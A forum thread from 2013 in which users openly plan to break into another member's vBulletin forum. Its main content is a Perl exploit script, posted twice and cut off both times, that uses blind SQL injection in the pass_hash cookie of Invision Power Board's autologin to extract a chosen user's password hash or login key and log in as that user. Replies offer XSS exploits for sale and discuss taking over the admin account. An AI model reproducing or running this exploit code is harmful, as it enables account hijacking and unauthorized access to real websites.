just for the ppl that have been wronged code for admin pass word
#!/usr/bin/perl -w################################################################### This one actually works :) Just paste the outputted cookie into# your request header using livehttpheaders or something and you# will probably be logged in as that user. No need to decrypt it!# Exploit coded by "ReMuSOMeGa & Nova" and http://remusomega.com###############...###########use LWP::UserAgent;$ua = new LWP::UserAgent;$ua->agent("Mosiac 1.0" . $ua->agent);if (!$ARGV[0]) {$ARGV[0] = '';}if (!$ARGV[3]) {$ARGV[3] = '';}my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';my $user = $ARGV[1]; # userid to jackmy $iver = $ARGV[2]; # version 1 or 2my $cpre = $ARGV[3]; # cookie prefixmy $dbug = $ARGV[4]; # debug?if (!$ARGV[2]){print "..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org [id] [ver 1/2].\n\n";exit;}my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");my $outputs = '';for( $i=1; $i < 33; $i++ ){for( $j=0; $j < 16; $j++ ){my $current = $charset[$j];my $sql = ( $iver < 2 ) ?"99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2527$current%2527)/*" :"99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i,1)%3d%2527$current%2527)/*";my @cookie = ('Cookie' => $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql);my $res = $ua->get($path, @cookie);# If we get a valid sql request then this# does not appear anywhere in the sources$pattern = '';$_ = $res->content;
Results 1 to 30 of 218
-
09-16-2013
-
-
09-16-2013
I AM GOING TO USE THAT CODE ON YOUR SITE STEVEYO.
-
09-16-2013
Got it? Well, now we are almost all set. So far, we know the site we wish to hack, and the member wewish to hack. In this case, we are hacking the administrator of "hackingsite", which is User ID "2". Now we need a nice exploit. I preferably, for 1.3.1 forums, use one that is in common circulationaround these forums. For those who don't have it, here:CODE#!/usr/bin/perl -w################################################################### This one actually works :) Just paste the outputted cookie into# your request header using livehttpheaders or something and you# will probably be logged in as that user. No need to decrypt it!# Exploit coded by "ReMuSOMeGa & Nova" and http://remusomega.com###############...###########use LWP::UserAgent;$ua = new LWP::UserAgent;$ua->agent("Mosiac 1.0" . $ua->agent);if (!$ARGV[0]) {$ARGV[0] = '';}if (!$ARGV[3]) {$ARGV[3] = '';}my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';my $user = $ARGV[1]; # userid to jack my $iver = $ARGV[2]; # version 1 or 2my $cpre = $ARGV[3]; # cookie prefixmy $dbug = $ARGV[4]; # debug?if (!$ARGV[2]){print "..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org [id] [ver 1/2].\n\n";exit;}my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");my $outputs = '';for( $i=1; $i < 33; $i++ ){for( $j=0; $j < 16; $j++ ){my $current = $charset[$j];my $sql = ( $iver < 2 ) ?"99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2527$current%2527)/*" :"99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i,1)%3d%2527$current%2527)/*";my @cookie = ('Cookie' => $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql);my $res = $ua->get($path, @cookie);# If we get a valid sql request then this# does not appear anywhere in the sources$pattern = '';$_ = $res->content;if ($dbug) { print };if ( !(/$pattern/) )
-
-
-
-
09-16-2013
it will when i fine a vulnerability .and y whant it work barry ?
Last edited by asux; 09-16-2013 at 07:52 AM.
-
-
-
-
09-16-2013
barry is that why it want work becouse i am a retard mmmmkay .you are so so smart it must be true .
-
-
09-16-2013
send me 50 bucks and i will give you the 4 xss exploits i have for this version of vbulletin
I am the owner of http://www.ezmangaforum.com
-
09-16-2013
why would i do that when ill get it for free ?
-
09-16-2013
find the upgrade.php and get ruby's customer number
i think clay was smart enough to delete teh install directory and move the admin path, but who knows
-
09-16-2013
ahahha, trying to use an ancient as fuck ipboard exploit on vb4
okay
-
09-16-2013
because they are not published anywhere, and all you know how to do is google vbulliten exploit, send me the money, and u can pwn the fuck out of an autistic guys message board
I am the owner of http://www.ezmangaforum.com
-
09-16-2013
if you want to try real vb xss or sql injection go ask milksnack for a real exploit, this is some useless shit that won't work on vb4.2
i hope asux was joking when he posted this shit
-
09-16-2013
htps://www.google.com/search?q=vbulliten+exploitI am the owner of http://www.ezmangaforum.com
-
09-16-2013
i wrote a bunch of xss rep exploits for rep boosting u want them send me the 50 bux
I am the owner of http://www.ezmangaforum.com
-
- Join Date
- Sep 2008
- Location
- i daer you to make it out of ferguson alive
- Posts
- 19,565
09-16-2013Clay patched up all pleb exploits. If elz can't do it why could anusex guy
*call centre crew*
*hate talking to people crew*
*get abused for a living crew*
*sexually harassed by hot women crew*
-
-
I am the owner of http://www.ezmangaforum.com
-
-
09-16-2013
good luck finding his customer number, i guess you could ask him for it??
I am the owner of http://www.ezmangaforum.com
-
-
09-16-2013
you want ruby's accont, then when u are admin u can do whatever, de-mod everyone first thing, and make me admin and we will rule over rubycalber.com for 1000 years
I am the owner of http://www.ezmangaforum.com
-
I am the owner of http://www.ezmangaforum.com
-
09-16-2013
YOUR WELCOME,
I am the owner of http://www.ezmangaforum.com
Thread Information
Users Browsing this Thread
There are currently 1 users browsing this thread. (0 members and 1 guests)